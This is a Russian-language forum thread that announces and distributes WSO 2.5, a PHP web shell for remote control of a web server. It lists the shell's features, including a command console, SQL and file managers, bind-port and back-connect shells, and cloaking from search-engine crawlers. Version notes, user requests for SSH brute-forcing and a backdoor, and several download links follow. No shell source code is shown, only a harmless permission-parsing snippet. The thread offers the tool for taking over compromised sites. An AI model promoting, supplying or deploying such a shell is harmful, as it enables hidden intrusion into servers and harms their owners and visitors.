WSO - веб-шелл WSO2.5Описание: Авторизация Информация о сервере Файловый менеджер (Копирование, переименование, перемещение, удаление, чмод, тач, создание файлов и папок) Просмотр, hexview, редактирование, давнлоад, аплоад файлов Работа с zip архивами (упаковка, распаковка) Консоль SQL менеджер (MySql, PostgreSql) Выполнение PHP кода Работа со строками + поиск хеша в онлайн базах Биндпорт и бек-коннект (Perl) Поиск текста в файлах *nix/Windows Из фишек Антипоисковик (проверяется User-Agent, если поисковик, тогда возвращается 404 ошибка) Консолька запоминает введенные команды. (перемещаться по ним можно с помощью стрелок вверх, вниз при фокусе на поле для ввода) Можно использовать AJAX Малый вес (22.8 KB) Выбор кодировки, в которой работает шелл. Данная утилита предоставляет веб-интерфейс для удаленной работы c операционной системой и ее службами/демонами. Использование данного продукта в незаконных целях грозит уголовной ответственностью. Скачать
Обновление: Пофиксил баги Мелкие исправления: - clear теперь очищает консоль, не делая запрос на сервер - При изменении кодировки, соединение с мускулом не "сбрасывается". Добавлены - Bind port to /bin/bash - изменение даты модификации файла Упаковал. Теперь вес (16 кб) Первый пост обновил. UPD: еще несколько фиксов. Спасибо: b3
Обновление: Уменьшен размер кода, генерируемого файловым менеджером Добавлен новый сервис для расшифровки хеша В файловом менеджере можно применять сортировки к столбцам В SQL менеджере новый вывод таблиц (более наглядный, подсчет записей в каждой таблице) Записи с длинным полями отображаются в компактном виде Сделал возможность дампа бд. Можно выбирать конкретные таблицы. В меню выделяется раздел, в котором находишься Все формы в разделе Tools теперь нормальные (отправляются по enter'у) Код местами переписан, + исправлены мелкие баги. Отредактировал первый пост.
Небольшие фиксы: - нормальная работа при safe-mode - после соединения с mysql сервером, кодировка устанавливалась с помощью функции mysql_set_charset. Почитал мануал повнимательней: PHP 5 >= 5.2.3. Пофиксил.
Опаньки)Ща испробуем.Будет ещё обновляться что-нить ?) 1)Или мне кажется,или r99 быстрее) 2) Я за смену дизайна(как у эрки) ). 3) Хорошо б замутить брут ssh+Брут по словарю)))))))) 4)Бэкконекта чет не вижу,а вот биндя есть. ЗЫ:Лови плюськи ) Обновляемый проект - хороший проект))).Буду(лично я - да) ждать с ультрамеганетерпением
Да, сейчас пишу вторую версию (переписываю с нуля). Будет заметно больше функционала, обновленный диз и нормальная кроссплатформенность. не совсем понял, что ты имел в виду (c99 или r57). Все зависит от много, в том числе, какой именно функционал шелла используется. Но по скорости они не должны заметно отличаться. по словарю будет, ssh - посмотрим. да, его там нет, сам его написать не мог, а чужой код вставлять не хотелось.
Code: if (($perms & 0xC000) == 0xC000) $info = 's'; else if (($perms & 0xA000) == 0xA000) $info = 'l'; else if (($perms & 0x8000) == 0x8000) $info = '-'; else if (($perms & 0x6000) == 0x6000) $info = 'b'; else if (($perms & 0x4000) == 0x4000) $info = 'd'; else if (($perms & 0x2000) == 0x2000) $info = 'c'; else if (($perms & 0x1000) == 0x1000) $info = 'p'; else $info = 'u'; Можно же сдвинуть вправо на 12 бит
Зачетный шел. Перешел с с99 madnet edition на этот. Из минусов - нету бекдора и дизайн мне больше нравился у c99 madnet. Автору респект
gromoza, дык в первом посте написано, что шелл только под *nix. wso2 сейчас уже нормально работает на обоих платформах. Когда напишу весь функционал, который задумал - выложу релиз.
oRb респект! крутой шелл получился! жду обновки! Хочеться еще консольку под виндувс (а то команды не пашут на виндовсе под твоим шеллом)
http://www.axifile.com/?3060315 http://depositfiles.com/files/2lvijsi1n http://ifolder.ru/11818910 http://zalil.ru/27486709 качаем наздоровье
Просто если php прикручен как cgi-обработчик, то Basic авторизация не пашет. Поэтому я и отказался от нее. Постараюсь реализовать в следующей версии Как нет? О_О Нажми на "Files" (2я ссыль в менюшке). Ага, упакован он по обычному, надо будет придумать что-нибудь другое. ps: по поводу диза. Цвет можно поменять самому. В начале скрипта есть переменная $color.